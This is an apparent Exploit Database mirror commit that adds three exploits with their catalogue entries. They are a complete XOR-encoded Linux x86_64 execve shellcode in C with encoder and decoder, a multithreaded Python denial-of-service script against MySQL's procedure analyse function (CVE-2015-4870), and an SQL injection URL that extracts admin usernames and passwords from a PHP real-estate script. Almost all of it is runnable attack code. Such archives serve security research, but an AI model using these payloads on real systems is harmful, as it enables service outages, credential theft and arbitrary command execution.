bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-05-31

Browse source 
3 new exploits

MySQL 5.5.45 - procedure analyse Function Denial of Service
Open Source Real Estate Script 3.6.0 - SQL Injection
Linux x86_64 XOR Encode execve Shellcode
This commit is contained in:
Offensive Security 2016-05-31 05:03:26 +00:00
parent ab85a62fd6
commit 22d168d0bc
4 changed files with 359 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

3
files.csv
View file

@ -36048,3 +36048,6 @@ id,file,description,date,author,platform,type,port
39862,platforms/multiple/dos/39862.txt,"Graphite2 - TtfUtil::CmapSubtable4NextCodepoint Heap-Based Overread",2016-05-26,"Google Security Research",multiple,dos,0 39862,platforms/multiple/dos/39862.txt,"Graphite2 - TtfUtil::CmapSubtable4NextCodepoint Heap-Based Overread",2016-05-26,"Google Security Research",multiple,dos,0
39863,platforms/multiple/dos/39863.txt,"Graphite2 - NameTable::getName Multiple Heap-Based Out-of-Bounds Reads",2016-05-26,"Google Security Research",multiple,dos,0 39863,platforms/multiple/dos/39863.txt,"Graphite2 - NameTable::getName Multiple Heap-Based Out-of-Bounds Reads",2016-05-26,"Google Security Research",multiple,dos,0
39864,platforms/php/webapps/39864.txt,"PHP Realestate Script Script 4.9.0 - SQL Injection",2016-05-27,"Meisam Monsef",php,webapps,80 39864,platforms/php/webapps/39864.txt,"PHP Realestate Script Script 4.9.0 - SQL Injection",2016-05-27,"Meisam Monsef",php,webapps,80
39867,platforms/multiple/dos/39867.py,"MySQL 5.5.45 - procedure analyse Function Denial of Service",2016-05-30,"Osanda Malith",multiple,dos,0
39868,platforms/php/webapps/39868.txt,"Open Source Real Estate Script 3.6.0 - SQL Injection",2016-05-30,"Meisam Monsef",php,webapps,80
39869,platforms/lin_x86-64/shellcode/39869.c,"Linux x86_64 XOR Encode execve Shellcode",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0

Can't render this file because it is too large.

241
platforms/lin_x86-64/shellcode/39869.c Executable file
View file

@ -0,0 +1,241 @@
/*
# Title : Linux x86_64 XOR encode execve("/bin//sh",{"//bin/sh","-i",NULL},NULL) shellcode
# Date : 31-05-2016
# Author : Roziul Hasan Khan Shifat
# Tested On : Ubuntu 14.04 LTS x86_64
*/
/*
main code
------------------------
section .text
global _start
_start:
xor rax,rax
xor rdx,rdx
push rax
push rax
mov [rsp],dword '//bi'
mov [rsp+4],dword 'n/sh'
mov rdi,rsp
push rax
push rax
mov [rsp],word '-i'
mov rsi,rsp
push rdx
push rsi
push rdi
mov rsi,rsp
add rax,59
syscall
Disassembly
------------------
Disassembly of section .text:
0000000000400080 <_start>:
400080: 48 31 c0 xor %rax,%rax
400083: 48 31 d2 xor %rdx,%rdx
400086: 50 push %rax
400087: 50 push %rax
400088: c7 04 24 2f 2f 62 69 movl $0x69622f2f,(%rsp)
40008f: c7 44 24 04 6e 2f 73 movl $0x68732f6e,0x4(%rsp)
400096: 68
400097: 48 89 e7 mov %rsp,%rdi
40009a: 50 push %rax
40009b: 50 push %rax
40009c: 66 c7 04 24 2d 69 movw $0x692d,(%rsp)
4000a2: 48 89 e6 mov %rsp,%rsi
4000a5: 52 push %rdx
4000a6: 56 push %rsi
4000a7: 57 push %rdi
4000a8: 48 89 e6 mov %rsp,%rsi
4000ab: 48 83 c0 3b add $0x3b,%rax
4000af: 0f 05 syscall
*/
/*
encoder
--------------
I used a python script and a C program to encode shellcode
python script
---------------------
a="\x48\x31\xc0\x48\x31\xd2\x50\x50\xc7\x04\x24\x2f\x2f\x62\x69\xc7\x44\x24\x04\x6e\x2f\x73\x68\x48\x89\xe7\x50\x50\x66\xc7\x04\x24\x2d\x69\x48\x89\xe6\x52\x56\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05"
print "shellcode length %d"%len(a)
a=a[::-1]
for i in range(len(a)-1):
print a[i].encode('hex')
C program
-----------------
#include<stdio.h>
#include<string.h>
main(int i,char *a[])
{
if(i!=2)
{
printf("Usage %s <filename>\n",a[0]);
return 0;
}
FILE *f,*o;
f=fopen(a[1],"r");
int shell;
o=fopen("shellencode.txt","w");
if(!f || !o )
{
perror("FILE I/O error: ");
return 0;
}
while( (fscanf(f,"%x",&shell)) !=EOF )
{
printf("%.2x\n",shell);
fprintf(o,"%#.2x,",shell^0x90); //0x90 is seed key
fflush(o);
}
fclose(o);
fclose(f);
return 0;
}
---------------------------------------------------------------------------------------------------------------------------------
I am sorry that My python script is very Poor .Search internet for better XOR encoder python script
MY Python script Reverse the shellcode
Then COPY & Paste the rerversed shellcode into a file
then i use the C program to encode reversed shellcode and write down shellencode.txt
-----------------------------------------------------------------------------------------------------------------------------
*/
/*
decoder
---------------
section .text
global _start
_start:
jmp shellcode
decoder:
pop rsi
xor rcx,rcx
mov cl,49
cdq
mov dl,0x90 ;seed key
decode:
xor rax,rax
mov al,[rsi]
xor al,dl
dec rsp
mov [rsp],byte al
inc rsi
loop decode
call rsp
shellcode:
call decoder
db 0x95,0x9f,0xab,0x50,0x13,0xd8,0x76,0x19,0xd8,0xc7,0xc6,0xc2,0x76,0x19,0xd8,0xf9,0xbd,0xb4,0x94,0x57,0xf6,0xc0,0xc0,0x77,0x19,0xd8,0xf8,0xe3,0xbf,0xfe,0x94,0xb4,0xd4,0x57,0xf9,0xf2,0xbf,0xbf,0xb4,0x94,0x57,0xc0,0xc0,0x42,0xa1,0xd8,0x50,0xa1
Disassembly
-------------------
Disassembly of section .text:
0000000000400080 <_start>:
400080: eb 1d jmp 40009f <shellcode>
0000000000400082 <decoder>:
400082: 5e pop %rsi
400083: 48 31 c9 xor %rcx,%rcx
400086: b1 31 mov $0x31,%cl
400088: 99 cltd
400089: b2 90 mov $0x90,%dl
000000000040008b <decode>:
40008b: 48 31 c0 xor %rax,%rax
40008e: 8a 06 mov (%rsi),%al
400090: 30 d0 xor %dl,%al
400092: 48 ff cc dec %rsp
400095: 88 04 24 mov %al,(%rsp)
400098: 48 ff c6 inc %rsi
40009b: e2 ee loop 40008b <decode>
40009d: ff d4 callq *%rsp
000000000040009f <shellcode>:
40009f: e8 de ff ff ff callq 400082 <decoder>
4000a4: 95 xchg %eax,%ebp
4000a5: 9f lahf
4000a6: ab stos %eax,%es:(%rdi)
4000a7: 50 push %rax
4000a8: 13 d8 adc %eax,%ebx
4000aa: 76 19 jbe 4000c5 <shellcode+0x26>
4000ac: d8 c7 fadd %st(7),%st
4000ae: c6 c2 76 mov $0x76,%dl
4000b1: 19 d8 sbb %ebx,%eax
4000b3: f9 stc
4000b4: bd b4 94 57 f6 mov $0xf65794b4,%ebp
4000b9: c0 c0 77 rol $0x77,%al
4000bc: 19 d8 sbb %ebx,%eax
4000be: f8 clc
4000bf: e3 bf jrcxz 400080 <_start>
4000c1: fe (bad)
4000c2: 94 xchg %eax,%esp
4000c3: b4 d4 mov $0xd4,%ah
4000c5: 57 push %rdi
4000c6: f9 stc
4000c7: f2 bf bf b4 94 57 repnz mov $0x5794b4bf,%edi
4000cd: c0 c0 42 rol $0x42,%al
4000d0: a1 .byte 0xa1
4000d1: d8 50 a1 fcoms -0x5f(%rax)
*/
/*
The shellcode decoder.asm is the encoded shellcode
*/
char shellcode[]="\xeb\x1d\x5e\x48\x31\xc9\xb1\x31\x99\xb2\x90\x48\x31\xc0\x8a\x06\x30\xd0\x48\xff\xcc\x88\x04\x24\x48\xff\xc6\xe2\xee\xff\xd4\xe8\xde\xff\xff\xff\x95\x9f\xab\x50\x13\xd8\x76\x19\xd8\xc7\xc6\xc2\x76\x19\xd8\xf9\xbd\xb4\x94\x57\xf6\xc0\xc0\x77\x19\xd8\xf8\xe3\xbf\xfe\x94\xb4\xd4\x57\xf9\xf2\xbf\xbf\xb4\x94\x57\xc0\xc0\x42\xa1\xd8\x50\xa1";
int main(int i,char *a[])
{
(* (int(*)()) shellcode)();
}

98
platforms/multiple/dos/39867.py Executable file
View file

@ -0,0 +1,98 @@
#!/usr/bin/env python
# Title: MySQL Procedure Analyse DoS Exploit
# Author: Osanda Malith Jayathissa (@OsandaMalith)
# E-Mail: osanda[cat]unseen.is
# Version: Vulnerable upto MySQL 5.5.45
# Original Write-up: https://osandamalith.wordpress.com/2016/05/29/mysql-dos-in-the-procedure-analyse-function-cve-2015-4870/
# This exploit is compatible with both Python 3.x and 2.x
# CVE: CVE-2015-4870
from __future__ import print_function
import threading
import time
import sys
import os
try:
import urllib.request as urllib2
import urllib.parse as urllib
except ImportError:
import urllib2
import urllib
try: input = raw_input
except NameError: pass
host = "http://host/xxx.php?id=1'"
payload = " procedure analyse((select*from(select 1)x),1)-- -"
payload = urllib.quote(payload)
url = host + payload
req = urllib2.Request(url)
req.add_header('Accept', '*/*')
req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0')
#req.add_header('Cookie', 'security=low; PHPSESSID=uegfnidhcdicvlsrc0uesio455')
req.add_header('Connection', '')
req.add_header('Content-type', 'text/xml')
cls = lambda: os.system('cls') if os.name == 'nt' else os.system('clear')
class DoS(threading.Thread):
def run(self):
print("{0} started!".format(self.getName()))
for i in range(100):
urllib2.urlopen(req)
time.sleep(.2)
print("{0} finished!".format(self.getName()))
def banner():
print ('''
____ _____ __
/'\\_/`\\ /\\ _`\\ /\\ __`\\/\\ \\
/\\ \\ __ __\\ \\,\\L\\_\\ \\ \\/\\ \\ \\ \\
\\ \\ \\__\\ \\/\\ \\/\\ \\\\/_\\__ \\\\ \\ \\ \\ \\ \\ \\ __
\\ \\ \\_/\\ \\ \\ \\_\\ \\ /\\ \\L\\ \\ \\ \\\\'\\\\ \\ \\L\\ \\
\\ \\_\\\\ \\_\\/`____ \\\\ `\\____\\ \\___\\_\\ \\____/
\\/_/ \\/_/`/___/> \\\\/_____/\\/__//_/\\/___/
/\\___/
\\/__/
____ ____
/\\ _`\\ /\\ _`\\
\\ \\ \\/\\ \\ ___\\ \\,\\L\\_\\
\\ \\ \\ \\ \\ / __`\\/_\\__ \\
\\ \\ \\_\\ \\/\\ \\L\\ \\/\\ \\L\\ \\
\\ \\____/\\ \\____/\\ `\\____\\
\\/___/ \\/___/ \\/_____/
[*] Author: Osanda Malith Jayathissa (@OsandaMalith)
[*] E-Mail: osanda[cat]unseen.is
[*] Website: http://osandamalith.wordpress.com
[!] Author takes no responsibility of any damage you cause
[!] Strictly for Educational purposes only
''')
print("[*] Host: {0}".format(host))
input("\n\t[-] Press Return to launch the attack\n")
def _start():
try:
cls()
banner()
for i in range(10000):
thread = DoS(name = "[+] Thread-{0}".format(i + 1))
thread.start()
time.sleep(.1)
except KeyboardInterrupt:
print ('\n[!] Ctrl + C detected\n[!] Exiting')
sys.exit(0)
except EOFError:
print ('\n[!] Ctrl + D detected\n[!] Exiting')
sys.exit(0)
if __name__ == '__main__':
_start()

17
platforms/php/webapps/39868.txt Executable file
View file

@ -0,0 +1,17 @@
# Exploit Title: real-estate classified script Sql Injection
# Date: 2015-05-29
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage:
http://www.phpscriptsmall.com/product/open-source-real-estate-script/
# Version: 3.6.0
Exploit :
http://server/[path]/contact_view.php?contact=-99999+[SQl+Command]
Test :
http://server/contact_view.php?contact=-25527%27+/*!50000union*/+select+1,2,3,4,5,6,7,8,9,10,11,10,13,14,15,16,17,18,19,20,username,22,password,24,25,26,27,28,29,30,31,32,33,34,35,36,37+/*!50000from*/+/*!50000admin_login*/%23
Admin Panel : http://server/admin/